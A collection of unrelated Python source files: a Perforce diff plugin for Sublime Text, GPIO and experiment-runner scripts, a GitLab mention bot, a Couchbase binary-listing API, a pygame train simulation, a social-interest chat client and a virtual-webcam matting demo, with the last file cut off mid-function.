def _createTemporaryDepotFile(self, file, revision):
with self._perforceWrapper as p4:
# @TODO: At some point in time, we may want to create temporary files with the same naming convention as p4v.
with tempfile.NamedTemporaryFile(prefix="subforce_", delete=False) as temporaryFile:
depotFilePath = getRevisionQualifiedDepotPath(file, revision)
depotFileText = p4.run_print(depotFilePath)[1]
temporaryFile.write(bytes(depotFileText, 'UTF-8'))
return temporaryFile.name
class SubforceViewGraphicalDiffWorkspaceFileCommand(sublime_plugin.WindowCommand):
'''
Diffs one or more files against a depot revision.
A single file may be diffed against any revision.
Multiple files may only be diffed against the have or head revisions.
'''
def run(self, paths=[]):
perforceWrapper = PerforceWrapper()
revisionManager = RevisionManager(self.window, perforceWrapper)
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
if len(paths) == 1:
path = paths[0]
def onDoneCallback(selectedRevision):
revisionManager.diffClientFileAgainstDepotRevision(selectedRevision, path)
revisionManager.showHaveHeadAndFileRevisions(path, onDoneCallback)
else:
def onDoneCallback(selectedRevision):
for path in paths:
revisionManager.diffClientFileAgainstDepotRevision(selectedRevision, path)
revisionManager.showHaveHeadRevisions(onDoneCallback)
class SubforceViewGraphicalDiffDepotRevisionsCommand(sublime_plugin.WindowCommand):
'''
Diffs two depot revisions of a given file.
Only a single file may be diffed at a time.
'''
def run(self, paths=[]):
perforceWrapper = PerforceWrapper()
revisionManager = RevisionManager(self.window, perforceWrapper)
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
path = checkForAndGetSinglePath(paths)
if not path:
return
def onDoneCallback1(selectedRevision1):
def onDoneCallback2(selectedRevision2):
revisionManager.diffDepotRevisions(selectedRevision1, selectedRevision2, path)
revisionManager.showHaveHeadAndFileRevisions(path, onDoneCallback2)
revisionManager.showHaveHeadAndFileRevisions(path, onDoneCallback1)
|
orangepiplatform.py
|
import time
import threading
from pyA20.gpio import gpio as GPIO # pylint: disable=import-error
from .rpilikeplatform import RPiLikePlatform
class OrangepiPlatform(RPiLikePlatform):
def __init__(self, config):
super(OrangepiPlatform, self).__init__(config, 'orangepi', GPIO)
def setup(self):
GPIO.init()
GPIO.setcfg(self._pconfig['button'], GPIO.INPUT)
GPIO.pullup(self._pconfig['button'], GPIO.PULLUP)
GPIO.setcfg(self._pconfig['rec_light'], GPIO.OUTPUT)
GPIO.setcfg(self._pconfig['plb_light'], GPIO.OUTPUT)
def after_setup(self, trigger_callback=None):
self._trigger_callback = trigger_callback
if self._trigger_callback:
thread = threading.Thread(target=self.wait_for_button, args=())
thread.daemon = True
thread.start()
def wait_for_button(self):
while True:
if GPIO.input(self._pconfig['button']) == 0:
self.detect_button()
time.sleep(.1)
def cleanup(self):
GPIO.output(self._pconfig['rec_light'], GPIO.LOW)
GPIO.output(self._pconfig['plb_light'], GPIO.LOW)
|
run_batch_experiments.py
|
import os, sys, signal
import random
import numpy as np
from multiprocessing import Process, Queue, current_process, freeze_support
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--method', type=str, default='ours')
parser.add_argument('--num-seeds', type=int, default=5)
parser.add_argument('--num-processes', type=int, default=1)
parser.add_argument('--save-dir', type=str, default='./results/2021-02-20/')
args = parser.parse_args()
''' generate seeds '''
seeds = []
for i in range(args.num_seeds):
seeds.append(i * 10)
''' generate commands '''
commands = []
for i in range(args.num_seeds):
seed = seeds[i]
save_dir = os.path.join(args.save_dir, args.method, str(seed))
if args.method == 'ours':
cmd = 'python example_finger_flip.py '\
'--seed {} '\
'--save-dir {} '\
'--visualize False'\
.format(seed, save_dir)
elif args.method == 'control-only':
cmd = 'python example_finger_flip.py '\
'--seed {} '\
'--save-dir {} '\
'--no-design-optim '\
'--visualize False'\
.format(seed, save_dir)
elif args.method == 'CMA':
cmd = 'python grad_free.py '\
'--seed {} '\
'--save-dir {} '\
'--optim CMA '\
'--max-iters 10000 '\
'--popsize 20 '\
'--visualize False'\
.format(seed, save_dir)
elif args.method == 'OnePlusOne':
cmd = 'python grad_free.py '\
'--seed {} '\
'--save-dir {} '\
'--optim OnePlusOne '\
'--max-iters 10000 '\
'--visualize False'\
.format(seed, save_dir)
commands.append(cmd)
def worker(input, output):
for cmd in iter(input.get, 'STOP'):
ret_code = os.system(cmd)
if ret_code != 0:
output.put('killed')
break
output.put('done')
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for cmd in commands:
task_queue.put(cmd)
# Submit stop signals
for i in range(args.num_processes):
task_queue.put('STOP')
# Start worker processes
for i in range(args.num_processes):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
for i in range(args.num_processes):
print(f'Process {i}', done_queue.get())
|
app.py
|
#!/usr/bin/env python
# coding: utf-8
import os
import json
import logging
from queue import Queue, Empty
from threading import Thread
import datetime
import math
import time
import argparse
import copy
from flask import Flask, request
## setup logging
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(help='Startup Mode')
group = parser.add_mutually_exclusive_group()
group.add_argument('-listen', action='store_true', default=False)
group.add_argument('-quick-check', action='store_true', default=False)
args = parser.parse_args() if __name__ == '__main__' else None
import logging.config
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'basic': {
'format':
'%(levelname)s %(asctime)s %(filename)s:%(lineno)d '
'%(message)s'
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'basic'
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'basic',
'filename': '/tmp/mention-bot-hook.log'
if args and args.listen else '/tmp/mention-bot-checks.log',
'maxBytes': 100*1024*1024,
'backupCount': 30
}
},
'root': {
'level': 'INFO',
'handlers': ['console', 'file']
}
})
logger = logging.getLogger()
## end logging setup
from mention import gitlab_client
from mention import mention_bot
from mention import config
from mention import helper
app = Flask(__name__)
_STOP_PROCESS = False
enclosure_queue = Queue()
@app.route('/check_health', methods=['GET'])
def check_health():
return "mention-bot"
@app.route('/', methods=['GET'])
def mentionbot():
return "Gitlab Mention Bot active"
@app.route('/', methods=['POST'])
def webhook():
event = request.headers.get('X-Gitlab-Event')
if not event:
return '', 400
if event != 'Merge Request Hook':
return '', 200
# add payload to queue so that _payload_worker(q) can process it in
# a separate thread
payload = json.loads(request.data)
enclosure_queue.put((datetime.datetime.now(), payload))
return "", 200
def _manage_payload(payload):
logger.info('_' * 80)
logger.info('Received payload<{}>: {}'.format(
id(payload), helper.load_dict_as_yaml(payload)))
username = payload['user']['username']
project_id = payload['object_attributes']['target_project_id']
target_branch = payload['object_attributes']['target_branch']
namespace = payload['object_attributes']['target']['path_with_namespace']
merge_request_id = payload['object_attributes']['iid']
# loading config
logger.info('Current Action={}'.format(
payload['object_attributes']['action']))
try:
cfg = mention_bot.get_repo_config(project_id, target_branch,
config.CONFIG_PATH)
diff_files = mention_bot.get_diff_files(project_id, merge_request_id)
logging.info(
f'PiD: {project_id}, IID: {merge_request_id}; files={diff_files}')
if mention_bot.is_valid(cfg, payload):
owners = mention_bot.guess_owners_for_merge_reqeust(
project_id, namespace, target_branch, merge_request_id,
username, cfg, diff_files)
if owners:
logging.info(f'owners = {owners}; username={username}')
mention_bot.add_comment(project_id, merge_request_id, username,
owners, cfg)
else:
logging.info(f'No Owners found: PiD:{project_id}; MID:{merge_request_id}, username: {username}')
if payload['object_attributes']['action'] in [
'open', 'reopen', 'closed', 'close', 'merge'
]:
mention_bot.manage_labels(payload, project_id, merge_request_id,
cfg, diff_files)
except gitlab_client.ConfigSyntaxError as e:
gitlab_client.add_comment_merge_request(project_id, merge_request_id,
e.message)
def _check_and_sleep(ts):
now = datetime.datetime.now()
exp_ts = datetime.timedelta(seconds=10) + ts
if exp_ts > now:
should_wait = math.ceil((exp_ts - now).total_seconds())
if should_wait:
logger.info('ts={}; now={}; sleeping for: {}'.format(
ts, now, should_wait))
time.sleep(should_wait)
def _payload_worker(q):
# this worker is needed solely because sometimes the MR comes in too fast,
# and gitlab queries fail. So let's add a delay of 10s, to ensure that
# all updates work.
logger.info('Looking for next payload')
global _STOP_PROCESS
while not _STOP_PROCESS:
try:
payload_ts, payload = q.get(timeout=2)
logger.info('Looking for next payload')
logger.info('Payload found: at ts={}; id={}'.format(
payload_ts, id(payload)))
_check_and_sleep(payload_ts)
try:
_manage_payload(payload)
except Exception as e:
logger.error(f'Exception with the message: {str(e)}')
q.task_done()
except Empty:
pass
def main():
# setup thread to handle the payloads
worker = Thread(target=_payload_worker, args=(enclosure_queue, ))
worker.setDaemon(True)
worker.start()
app.run(host='0.0.0.0')
global _STOP_PROCESS
_STOP_PROCESS = True
logger.info('Stopping worker...')
worker.join()
logger.info('worker stopped...')
if __name__ == '__main__':
logger.info(f'args = {args}...')
config.check_config()
if args.listen:
main()
if args.quick_check:
mention_bot.check_merge_requests('p/higgs')
|
api.py
|
#!/usr/bin/env python3
import binaries
import db
import flask
import json
import os
import redis
import threading
import time
from ast import literal_eval
from celery import Celery
from flask import request
from flask_cors import CORS, cross_origin
from shutil import copy
queue_poll_interval = 10
default_product = "couchbase-server"
default_edition = "enterprise"
celery = Celery(broker='redis://redis//')
r = redis.StrictRedis(host='redis', port='6379')
app = flask.Flask(__name__)
app.config['CORS_HEADERS'] = 'Content-Type'
app.config["DEBUG"] = True
cors = CORS(app)
queue = []
@app.route('/', methods=['GET'])
@cross_origin()
def api_home():
return ""
@app.route('/api/v1/queue', methods=['GET'])
@cross_origin()
def api_queue():
""" Return a list of currently processed/queued jobs """
return json.dumps(queue)
@app.route('/api/v1/distros', methods=['GET'])
@cross_origin()
def api_distros():
""" Retrieve a list of distros for which file lists have been gathered """
return json.dumps([d[0] for d in db.query(
"SELECT UNIQUE(distro) FROM listings WHERE status='ok' ORDER by distro ASC"
)])
@app.route('/api/v1/versions', methods=['GET'])
@cross_origin()
def api_versions():
""" Retrieve a list of versions (optionally for a given distro) """
[distro, product] = map(request.args.get, ['distro', 'product'])
if not product:
product = default_product
if distro:
results = db.query(
"SELECT UNIQUE(version) FROM listings WHERE status='ok' AND product=%s AND distro=%s ORDER by version ASC",
(product, distro,)
)
else:
results = db.query(
"SELECT UNIQUE(version) FROM listings WHERE product=%s AND status='ok' ORDER by version ASC",
(product, )
)
if results:
return json.dumps([v[0] for v in results])
return json.dumps({})
@app.route('/api/v1/listing', methods=['GET', 'POST'])
@cross_origin()
def api_listing():
"""
GET: Retrieve a file/folder listing for a given distro + product + version + edition [+ build]
POST: Remove any existing record, and add a listing to the database
"""
global queue
if request.method == "GET":
[distro, product, version, build, edition, force] = map(
request.args.get, ['distro', 'product', 'version', 'build', 'edition', 'force'])
if not any([distro, version]):
return f'{"error": "distro and version must be provided."}'
if version.find("-") > 0:
[version, build] = version.split("-")
else:
build = "GA"
if not product:
product = default_product
if not edition:
edition = default_edition
return str(binaries.get_files(
distro=distro, product=product, edition=edition, version=version, build=build, force=force, queue=queue
))
elif request.method == "POST":
payload = json.loads(request.form.get('payload'))
db.exec(
"DELETE FROM listings WHERE product=%s and edition=%s and version=%s and build=%s and distro=%s",
(payload['product'], payload['edition'],
payload['version'], payload['build'], payload['distro'])
)
db.exec(
"INSERT INTO listings(status, product, edition, version, build, distro, files, url, runcmd, msg) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)",
(payload['status'], payload['product'], payload['edition'], payload['version'], payload['build'],
payload['distro'], json.dumps(payload['files']), payload['url'], payload['runcmd'], payload['msg'])
)
return {}
@app.route('/api/v1/compare', methods=['GET'])
@cross_origin()
def api_compare():
""" Retrieve a comparison between two versions """
global queue
[distro, product, from_version, to_version, edition] = map(
request.args.get, ['distro', 'product', 'from_version', 'to_version', 'edition'])
if from_version and to_version:
if "-" not in from_version:
from_version = f"{from_version}-GA"
if "-" not in to_version:
to_version = f"{to_version}-GA"
[from_version, from_build] = from_version.split("-")
[to_version, to_build] = to_version.split("-")
from_listing = json.loads(binaries.get_files(
distro, product, edition, from_version, from_build, queue=queue))
to_listing = json.loads(binaries.get_files(
distro, product, edition, to_version, to_build, queue=queue))
new_binaries = list(
set(to_listing['files']) - set(from_listing['files']))
removed_binaries = list(
set(from_listing['files']) - set(to_listing['files']))
# note: paths aren't actually stored in the database. We figure those
# out as a convenience in binaries.py/get_files()
new_binary_dirs = list(
set(to_listing['paths']) - set(from_listing['paths']))
removed_binary_dirs = list(
set(from_listing['paths']) - set(to_listing['paths']))
return json.dumps({
"distro": distro,
"from_version": from_version,
"from_build": from_build,
"to_version": to_version,
"to_build": to_build,
"new_binary_dirs": sorted(new_binary_dirs),
"removed_binary_dirs": sorted(removed_binary_dirs),
"new_binaries": sorted(new_binaries),
"removed_binaries": sorted(removed_binaries),
})
else:
return {"error": "from and to must be provided."}
def monitor_queue():
"""
This function runs in a thread to periodically poll the queue.
We need to speak to redis and celery (which is slow and blocky)
so rather than figure out what's queued on demand, we just do
it every queue_poll_interval seconds and refer to the in memory
results
"""
global queue
global queue_poll_interval
while True:
newqueue = []
uniques = []
# Check redis
tasks = [json.loads(pending_task)['headers']
for pending_task in r.lrange('celery', 0, -1)]
for task in tasks:
t = literal_eval(task['argsrepr'])
print(task)
unique_ref = f"{t[0]}{t[1]}{t[2]}{t[3]}{t[4]}"
if unique_ref not in uniques:
uniques.append(unique_ref)
newqueue.append({
"distro": t[0],
"product": t[1],
"edition": t[2],
"version": t[3],
"build": t[4],
"status": "queued"
})
# Check celery
q = celery.control.inspect()
for subset in ["active", "reserved"]:
if eval(f"q.{subset}()"):
for _, v in eval(f"q.{subset}().items()"):
for item in v:
[distro, product, edition, version, build] = item['args']
unique_ref = f"{distro}{product}{edition}{version}{build}"
if unique_ref not in uniques:
uniques.append(unique_ref)
newqueue.append({
"distro": distro,
"product": product,
"edition": edition,
"version": version,
"build": build,
"status": "processing" if subset == "active" else "queued"
})
queue = newqueue
time.sleep(queue_poll_interval)
def main():
db.bootstrap()
thread = threading.Thread(target=monitor_queue)
thread.start()
app.run(threaded=True, host='0.0.0.0', port=5000)
if __name__ == "__main__":
main()
|
trab_atualizado.py
|
# -*- coding: utf-8 -*-
"""trab_atualizado.ipynb"""
import pygame, random
from pygame.locals import *
import threading
from threading import Lock
mutex1 = threading.Lock()
mutex2 = threading.Lock()
mutex3 = threading.Lock()
mutex4 = threading.Lock()
mutex5 = threading.Lock()
UP = 0
RIGHT = 1
DOWN = 2
LEFT = 3
pygame.init()
screen = pygame.display.set_mode((600,600))
pygame.display.set_caption('Trens')
clock = pygame.time.Clock()
class MyGame():
def __init__(self):
self.direction_verde = RIGHT
self.direction_roxo = RIGHT
self.direction_laranja = RIGHT
self.direction_azul = LEFT
self.trem_verde_pos = (100, 100)
self.trem_verde = pygame.Surface((10,10))
self.trem_verde.fill((0,255,0))
self.trem_roxo_pos = (200, 100)
self.trem_roxo = pygame.Surface((10,10))
self.trem_roxo.fill((128,0,255))
self.trem_laranja_pos = (300, 100)
self.trem_laranja = pygame.Surface((10,10))
self.trem_laranja.fill((255,128,0))
self.trem_azul_pos = (100, 200)
self.trem_azul = pygame.Surface((10,10))
self.trem_azul.fill((0,0,255))
self.t_v = threading.Thread(target=self.trem_verde_)
self.t_r = threading.Thread(target=self.trem_roxo_)
self.t_a = threading.Thread(target=self.trem_laranja_)
self.t_z = threading.Thread(target=self.trem_azul_)
self.t_v.start()
self.t_r.start()
self.t_a.start()
self.t_z.start()
#Direção de acordo com a posição
#Movimento de acordo com posição
def L1(self):
if self.direction_verde == UP:
self.trem_verde_pos = (self.trem_verde_pos[0], self.trem_verde_pos[1] - 10)
def L2(self):
if self.direction_verde == RIGHT:
self.trem_verde_pos = (self.trem_verde_pos[0] + 10, self.trem_verde_pos[1])
def L3(self):
if self.direction_verde == DOWN:
self.trem_verde_pos = (self.trem_verde_pos[0], self.trem_verde_pos[1] + 10)
if self.direction_roxo == UP:
self.trem_roxo_pos = (self.trem_roxo_pos[0], self.trem_roxo_pos[1] - 10)
def L4(self):
if self.direction_verde == LEFT:
self.trem_verde_pos = (self.trem_verde_pos[0] - 10, self.trem_verde_pos[1])
if self.direction_azul == RIGHT:
self.trem_azul_pos = (self.trem_azul_pos[0] + 10, self.trem_azul_pos[1])
def L5(self):
if self.direction_roxo == DOWN:
self.trem_roxo_pos = (self.trem_roxo_pos[0], self.trem_roxo_pos[1] + 10)
if self.direction_laranja == UP:
self.trem_laranja_pos = (self.trem_laranja_pos[0], self.trem_laranja_pos[1] - 10)
def L6(self):
if self.direction_roxo == LEFT:
self.trem_roxo_pos = (self.trem_roxo_pos[0] - 10, self.trem_roxo_pos[1])
if self.direction_azul == RIGHT:
self.trem_azul_pos = (self.trem_azul_pos[0] + 10, self.trem_azul_pos[1])
def L7(self):
if self.direction_roxo == RIGHT:
self.trem_roxo_pos = (self.trem_roxo_pos[0] + 10, self.trem_roxo_pos[1])
def L8(self):
if self.direction_laranja == RIGHT:
self.trem_laranja_pos = (self.trem_laranja_pos[0] + 10, self.trem_laranja_pos[1])
def L9(self):
if self.direction_laranja == DOWN:
self.trem_laranja_pos = (self.trem_laranja_pos[0], self.trem_laranja_pos[1] + 10)
def L10(self):
if self.direction_laranja == LEFT:
self.trem_laranja_pos = (self.trem_laranja_pos[0] - 10, self.trem_laranja_pos[1])
if self.direction_azul == RIGHT:
self.trem_azul_pos = (self.trem_azul_pos[0] + 10, self.trem_azul_pos[1])
def L11(self):
if self.direction_azul == UP:
self.trem_azul_pos = (self.trem_azul_pos[0], self.trem_azul_pos[1] - 10)
def L12(self):
if self.direction_azul == DOWN:
self.trem_azul_pos = (self.trem_azul_pos[0], self.trem_azul_pos[1] + 10)
def L13(self):
if self.direction_azul == LEFT:
self.trem_azul_pos = (self.trem_azul_pos[0] - 10, self.trem_azul_pos[1])
def trem_verde_(self):
if self.trem_verde_pos == (100, 100):
self.direction_verde = RIGHT
if self.trem_verde_pos == (200, 100):
self.direction_verde = DOWN
if self.trem_verde_pos == (200, 200):
self.direction_verde = LEFT
if self.trem_verde_pos == (100, 200):
self.direction_verde = UP
self.L1()
self.L2()
mutex1.acquire()
self.L3()
mutex2.acquire()
mutex1.release()
self.L4()
mutex2.release()
screen.fill((0,0,0))
screen.blit(self.trem_verde, self.trem_verde_pos)
screen.blit(self.trem_roxo, self.trem_roxo_pos)
screen.blit(self.trem_laranja, self.trem_laranja_pos)
screen.blit(self.trem_azul, self.trem_azul_pos)
def trem_roxo_(self):
if self.trem_roxo_pos == (200, 100):
self.direction_roxo = RIGHT
if self.trem_roxo_pos == (300, 100):
self.direction_roxo = DOWN
if self.trem_roxo_pos == (300, 200):
self.direction_roxo = LEFT
if self.trem_roxo_pos == (200, 200):
self.direction_roxo = UP
self.L7()
mutex4.acquire()
self.L5()
mutex3.acquire()
mutex4.release()
self.L6()
mutex1.acquire()
mutex3.release()
self.L3()
mutex1.release()
screen.fill((0,0,0))
screen.blit(self.trem_verde, self.trem_verde_pos)
screen.blit(self.trem_roxo, self.trem_roxo_pos)
screen.blit(self.trem_laranja, self.trem_laranja_pos)
screen.blit(self.trem_azul, self.trem_azul_pos)
def trem_laranja_(self):
if self.trem_laranja_pos == (300, 100):
self.direction_laranja = RIGHT
if self.trem_laranja_pos == (400, 100):
self.direction_laranja = DOWN
if self.trem_laranja_pos == (400, 200):
self.direction_laranja = LEFT
if self.trem_laranja_pos == (300, 200):
self.direction_laranja = UP
self.L8()
self.L9()
mutex5.acquire()
self.L10()
mutex4.acquire()
mutex5.release()
self.L5()
mutex4.release()
screen.fill((0,0,0))
screen.blit(self.trem_verde, self.trem_verde_pos)
screen.blit(self.trem_roxo, self.trem_roxo_pos)
screen.blit(self.trem_laranja, self.trem_laranja_pos)
screen.blit(self.trem_azul, self.trem_azul_pos)
def trem_azul_(self):
if self.trem_azul_pos == (100, 200):
self.direction_azul = RIGHT
if self.trem_azul_pos == (400, 200):
self.direction_azul = DOWN
if self.trem_azul_pos == (400, 300):
self.direction_azul = LEFT
if self.trem_azul_pos == (100, 300):
self.direction_azul = UP
mutex3.acquire()
mutex2.acquire()
mutex5.acquire()
self.L4()
mutex2.release()
self.L6()
mutex3.release()
self.L10()
mutex5.release()
self.L12()
self.L13()
self.L11()
screen.fill((0,0,0))
screen.blit(self.trem_verde, self.trem_verde_pos)
screen.blit(self.trem_roxo, self.trem_roxo_pos)
screen.blit(self.trem_laranja, self.trem_laranja_pos)
screen.blit(self.trem_azul, self.trem_azul_pos)
if __name__ == '__main__':
mygame = MyGame()
while True:
clock.tick(10)
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
mygame.trem_roxo_()
mygame.trem_verde_()
mygame.trem_laranja_()
mygame.trem_azul_()
pygame.draw.rect(screen, (255,255,255), [100, 100, 100, 100], 5)
pygame.draw.rect(screen, (255,255,255), [200, 100, 100, 100], 5)
pygame.draw.rect(screen, (255,255,255), [300, 100, 100, 100], 5)
pygame.draw.rect(screen, (255,255,255), [100, 200, 300, 100], 5)
pygame.display.update()
|
client_main.py
|
import threading
import time
import requests
import sys
import json
import os
import jieba.analyse
from PyQt5 import QtCore, QtGui, QtWidgets
import pickle
from Spiders.bilibili.spider import Bilibili
from Spiders.zhihu.spider import Zhihu
from tools.helper import LoginHelper
from Chat import chat_client
pickle_file = 'pickle.pkl'
bilibili_history = []
bilibili_users = []
def bilibili_run():
global bilibili_history
global bilibili_users
login_helper = LoginHelper()
login_helper.login(Bilibili.login_url)
bilibili = Bilibili(login_helper.get_cookies(), login_helper.get_driver())
bilibili_history = bilibili.get_user_history(max_history_record=500)
bilibili_users = bilibili.get_following_user()
login_helper.driver.quit()
zhihu_following_topics = []
zhihu_related_questions = []
zhihu_following_questions = []
server_ip = '127.0.0.1:8899'
id_str = ''
def zhihu_run():
global zhihu_following_questions
global zhihu_following_topics
global zhihu_related_questions
zhihu_login_helper = LoginHelper()
zhihu_login_helper.login(Zhihu.login_url)
zhihu = Zhihu(zhihu_login_helper.get_cookies(), zhihu_login_helper.get_driver())
zhihu_following_questions = zhihu.get_following_questions()
zhihu_following_topics = zhihu.get_following_topics()
zhihu_related_questions = zhihu.get_related_questions(100)
zhihu_login_helper.driver.quit()
def heartbeat_run():
assert id_str
while True:
requests.post('http://{}/heartbeat'.format(server_ip), id_str)
time.sleep(3)
def is_yes(s):
s = s.strip().upper()
if s == 'YES' or s == 'Y':
return True
return False
if __name__ == '__main__':
port = int(sys.argv[1])
chat_client.LISTEN_PORT = port
app = QtWidgets.QApplication(sys.argv)
window = chat_client.ExampleApp()
window.listen_in_thread()
window.show()
# 如果3天内已经爬起过数据,直接读取pickle文件
if os.path.exists(pickle_file) and time.time() - os.path.getmtime(pickle_file) < 60*60*25*3:
pkl_file = open(pickle_file, 'rb')
user_profile = pickle.load(pkl_file)
pkl_file.close()
# 否则重新爬取数据
else:
bilibili_thread = threading.Thread(target=bilibili_run)
bilibili_thread.start()
zhihu_thread = threading.Thread(target=zhihu_run)
zhihu_thread.start()
bilibili_thread.join()
zhihu_thread.join()
# 获取关键词
corpus = ''
for que in zhihu_related_questions + zhihu_following_questions:
corpus += '。' + que
question_keyword = jieba.analyse.textrank(corpus)
corpus = ''
for history in bilibili_history:
corpus += '。' + history
video_keyword = jieba.analyse.textrank(corpus)
topics = zhihu_following_topics
video_up = bilibili_users
user_profile = {
'question_keyword': question_keyword,
'video_keyword': video_keyword,
'topics': topics,
'video_up': video_up
}
with open(pickle_file, 'wb') as f:
pickle.dump(user_profile, f)
# print('user_profile', user_profile)
resp = requests.post('http://{}/signin?port={}'.format(server_ip, port), json.dumps(user_profile))
id_str = resp.content.decode()
# 向server发送心跳
heartbeat_thread = threading.Thread(target=heartbeat_run)
heartbeat_thread.setDaemon(True)
heartbeat_thread.start()
while True:
s = input('Do you want to connect to a random user? [Y/N] (N to exit)')
if is_yes(s):
# 获取随机匹配/有相似兴趣的用户
resp = requests.post('http://{}/hello'.format(server_ip), id_str)
peer = json.loads(resp.content.decode())
print(peer)
if 'common' not in peer:
print(peer[0])
s = input('Do you want to exit? [Y/N]')
if is_yes(s):
break
else:
chat_client.client_ip = peer['ip']
chat_client.CONNECT_PORT = int(peer['port'])
intro = ''
for k in peer['common'].keys():
intro += k + ': '
for t in peer['common'][k]:
intro += t + ', '
intro += '\n\n'
window.connect_to()
# 告知用户共同兴趣信息
shard_num = (len(intro.encode(encoding="utf-8"))+4096) // 4096
shard_size = len(intro) // shard_num
for i in range(shard_num):
window.send(intro[i*shard_size: (i+1)*shard_size])
# window.send(intro)
sys.exit(app.exec())
else:
break
exit()
|
demo_webcam.py
|
"""
Videoconferencing plugin demo for Linux.
v4l2loopback-utils needs to be installed, and a virtual webcam needs to be running at `--camera-device` (default: /dev/video1).
A target image and background should be supplied (default: demo_image.png and demo_video.mp4)
Once launched, the script is in background collection mode. Exit the frame and click to collect a background frame.
Upon returning, cycle through different target backgrounds by clicking.
Press Q any time to exit.
Example:
python demo_webcam.py --model-checkpoint "PATH_TO_CHECKPOINT" --resolution 1280 720 --hide-fps
"""
import argparse, os, shutil, time
import numpy as np
import cv2
import torch
from torch import nn
from torch.utils.data import Dataset, DataLoader
from torchvision.transforms import Compose, ToTensor, Resize
from torchvision.transforms.functional import to_pil_image
from threading import Thread, Lock
from tqdm import tqdm
from PIL import Image
import pyfakewebcam # pip install pyfakewebcam
# --------------- App setup ---------------
app = {
"mode": "background",
"bgr": None,
"bgr_blur": None,
"compose_mode": "plain",
"target_background_frame": 0
}
# --------------- Arguments ---------------
parser = argparse.ArgumentParser(description='Virtual webcam demo')
parser.add_argument('--model-backbone-scale', type=float, default=0.25)
parser.add_argument('--model-checkpoint', type=str, required=True)
parser.add_argument('--model-refine-mode', type=str, default='sampling', choices=['full', 'sampling', 'thresholding'])
parser.add_argument('--model-refine-sample-pixels', type=int, default=80_000)
parser.add_argument('--model-refine-threshold', type=float, default=0.7)
parser.add_argument('--hide-fps', action='store_true')
parser.add_argument('--resolution', type=int, nargs=2, metavar=('width', 'height'), default=(1280, 720))
parser.add_argument('--target-video', type=str, default='./demo_video.mp4')
parser.add_argument('--target-image', type=str, default='./demo_image.jpg')
parser.add_argument('--camera-device', type=str, default='/dev/video1')
args = parser.parse_args()
# ----------- Utility classes -------------
# A wrapper that reads data from cv2.VideoCapture in its own thread to optimize.
# Use .read() in a tight loop to get the newest frame
class Camera:
def __init__(self, device_id=0, width=1280, height=720):
self.capture = cv2.VideoCapture(device_id)
self.capture.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.capture.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'));
self.width = int(self.capture.get(cv2.CAP_PROP_FRAME_WIDTH))
self.height = int(self.capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
# self.capture.set(cv2.CAP_PROP_BUFFERSIZE, 2)
self.success_reading, self.frame = self.capture.read()
self.read_lock = Lock()
self.thread = Thread(target=self.__update, args=())
self.thread.daemon = True
self.thread.start()
def __update(self):
while self.success_reading:
grabbed, frame = self.capture.read()
with self.read_lock:
self.success_reading = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
return frame
def __exit__(self, exec_type, exc_value, traceback):
self.capture.release()
# An FPS tracker that computes exponentialy moving average FPS
class FPSTracker:
def __init__(self, ratio=0.5):
self._last_tick = None
self._avg_fps = None
self.ratio = ratio
def tick(self):
if self._last_tick is None:
self._last_tick = time.time()
return None
t_new = time.time()
fps_sample = 1.0 / (t_new - self._last_tick)
self._avg_fps = self.ratio * fps_sample + (1 - self.ratio) * self._avg_fps if self._avg_fps is not None else fps_sample
self._last_tick = t_new
return self.get()
def get(self):
return self._avg_fps
# Wrapper for playing a stream with cv2.imshow(). It can accept an image and return keypress info for basic interactivity.
# It also tracks FPS and optionally overlays info onto the stream.
class Displayer:
def __init__(self, title, width=None, height=None, show_info=True):
self.title, self.width, self.height = title, width, height
self.show_info = show_info
self.fps_tracker = FPSTracker()
self.webcam = None
cv2.namedWindow(self.title, cv2.WINDOW_NORMAL)
if width is not None and height is not None:
cv2.resizeWindow(self.title, width, height)
# Update the currently showing frame and return key press char code
def step(self, image):
fps_estimate = self.fps_tracker.tick()
if self.show_info and fps_estimate is not None:
message = f"{int(fps_estimate)} fps | {self.width}x{self.height}"
cv2.putText(image, message, (10, 40), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 0))
if self.webcam is not None:
image_web = np.ascontiguousarray(image, dtype=np.uint8) # .copy()
image_web = cv2.cvtColor(image_web, cv2.COLOR_RGB2BGR)
self.webcam.schedule_frame(image_web)
# else:
cv2.imshow(self.title, image)
return cv2.waitKey(1) & 0xFF
class Controller: # A cv2 window with a couple buttons for background capture and cycling through target background options
def __init__(self):
self.name = "RTHRBM Control"
self.controls = [
{
"type": "button",
"name": "mode_switch",
"label": "Grab background",
"x": 50,
"y": 20,
"w": 300,
"h": 40
},
{
"type": "button",
"name": "compose_switch",
"label": "Compose: plain white",
"x": 50,
"y": 100,
"w": 300,
"h": 40
}
]
cv2.namedWindow(self.name)
cv2.moveWindow(self.name, 200, 200)
cv2.setMouseCallback(self.name, self._raw_process_click)
self.render()
def render(self):
control_image = np.zeros((160,400), np.uint8)
for button in self.controls:
control_image[button["y"]:button["y"] + button["h"],button["x"]:button["x"] + button["w"]] = 180
cv2.putText(control_image, button["label"], (button["x"] + 10, button["y"] + button["h"] // 2 ), cv2.FONT_HERSHEY_SIMPLEX, 0.5, 0, 1)
cv2.imshow(self.name, control_image)
def clicked(self, control):
if control["name"] == "mode_switch":
if app["mode"] == "background":
grab_bgr()
app["mode"] = "stream"
control["label"] = "Select another background"
else:
app["mode"] = "background"
control["label"] = "Grab background"
elif control["name"] == "compose_switch":
